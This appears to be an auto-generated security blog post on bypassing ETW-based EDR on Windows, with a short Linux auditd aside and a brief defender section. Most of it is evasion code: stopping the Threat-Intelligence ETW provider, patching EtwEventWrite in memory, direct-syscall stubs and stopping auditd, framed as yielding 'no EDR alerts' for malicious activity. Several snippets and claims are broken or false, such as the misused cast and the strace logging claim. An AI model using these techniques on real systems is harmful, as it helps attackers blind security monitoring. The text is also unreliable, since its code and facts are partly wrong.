Source: Binarly.io
You Should Know:
Modern Endpoint Detection and Response (EDR) solutions often rely on Event Tracing for Windows (ETW) for deep visibility into system activities. However, ETW-based detection mechanisms have inherent design flaws that attackers can exploit. Below are key techniques, commands, and code snippets to understand and bypass ETW-based EDR solutions.
1. Disabling ETW Providers
ETW providers log system events, which EDRs use for detection. Attackers can disable them using PowerShell or C:
PowerShell Command:
logman stop "Microsoft-Windows-Threat-Intelligence" -ets
C Code (P/Invoke):
[DllImport("ntdll.dll")]
public static extern int NtSetInformationProcess(IntPtr hProcess, int processInformationClass, ref int processInformation, int processInformationLength);
public static void DisableETW() {
int isDebuggerPresent = 1;
NtSetInformationProcess(Process.GetCurrentProcess().Handle, 0x1F, ref isDebuggerPresent, sizeof(int));
}
2. Patching ETW in Memory
Attackers can patch `EtwEventWrite` in memory to prevent logging:
x64 Assembly Patch:
mov eax, 0 ret
C++ Implementation:
void PatchETW() {
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
FARPROC pEtwEventWrite = GetProcAddress(hNtdll, "EtwEventWrite");
DWORD oldProtect;
VirtualProtect(pEtwEventWrite, 1, PAGE_EXECUTE_READWRITE, &oldProtect);
reinterpret_cast<BYTE>(pEtwEventWrite) = 0xC3; // ret
VirtualProtect(pEtwEventWrite, 1, oldProtect, &oldProtect);
}
3. Using Direct Syscalls to Bypass ETW Hooks
EDRs often hook Nt/Zw calls. Direct syscalls bypass these hooks:
Syscall in C (Mimikatz Style):
__declspec(naked) NTSTATUS NtAllocateVirtualMemory(
HANDLE ProcessHandle, PVOID BaseAddress, ULONG ZeroBits,
PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect) {
__asm {
mov r10, rcx
mov eax, 0x18
syscall
ret
}
}
4. Linux Equivalent: Bypassing Auditd (For Comparison)
On Linux, attackers may disable `auditd` to avoid logging:
Terminate Auditd:
sudo systemctl stop auditd
Prevent Logging via `strace`:
strace -e trace=none ./malicious_binary
5. Detecting ETW Tampering (Blue Team Perspective)
Defenders can check for ETW disruptions using:
PowerShell:
Get-WinEvent -ListProvider "Microsoft-Windows-Threat-Intelligence" | fl Enabled
Windows Event Logs:
Get-WinEvent -LogName "Microsoft-Windows-Threat-Intelligence/Operational"
What Undercode Say
ETW remains a critical but flawed component in modern EDR architectures. While it provides deep visibility, attackers can disable, patch, or bypass it using direct syscalls and memory manipulation. Defenders must monitor for ETW tampering and supplement detection with behavioral analytics.
Expected Output:
- Successful bypass of ETW-based detection.
- No EDR alerts triggered for malicious activity.
- Defenders see gaps in telemetry.
Prediction:
As EDRs evolve, they will likely move toward kernel-mode callbacks and AI-based anomaly detection, reducing reliance on ETW. Attackers will shift to exploiting kernel drivers or firmware for evasion.
(End of )
References:
Reported By: Yehiamamdouh Design – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
